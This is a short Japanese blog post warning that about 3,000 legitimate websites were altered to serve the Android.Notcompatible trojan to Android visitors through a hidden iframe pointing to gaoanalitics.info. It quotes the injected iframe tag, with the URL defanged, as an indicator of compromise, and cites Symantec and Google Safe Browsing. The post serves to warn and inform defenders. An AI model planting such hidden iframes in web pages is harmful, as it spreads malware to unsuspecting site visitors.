gaoanalitics.info サイト改ざんが約3,000件 (Android向けマルウェア散布)


 Windowsユーザーではなく、スマートフォンのAndroid端末をターゲットとした正規サイトの大量改ざん攻撃。日本の一般サイトでも複数殺られてる感じ? イメージ 1
Android を狙うトロイの木馬と連動した Web サイトインジェクション攻撃 (Symantec)
配信されるAndroidマルウェア Android.Notcompatible


 改ざん被害を受けてるページの最後尾に下のような不審なIFRAMEタグ(インラインフレーム)が挿入されてます。Android端末だと、.apkファイルなウイルスが自動的にダウンロードされてしまうっぽい。(それをインストールしないと感染状態にはならない)



<iframe style="visibility: hidden; display: none; display: none;" src="https:// gaoanalitics. info/?id={*****}"></iframe>


 Google Safe Browsing機能で”攻撃サイト”(このサイトはコンピュータに損害を与える可能性があります)として判定してるドメイン「gaoanalitics. info」の改ざん数を見てみると、この記事を書いてる時点で『過去 90 日間に不正なソフトウェアのホスティングが行われ、3053 個のドメインへの感染が判明』との情報。 イメージ 2



www.google.com/safebrowsing/diagnostic?hl=ja&site=gaoanalitics.info


http://farm8.staticflickr.com/7150/6481658431_c825de1180_z.jpg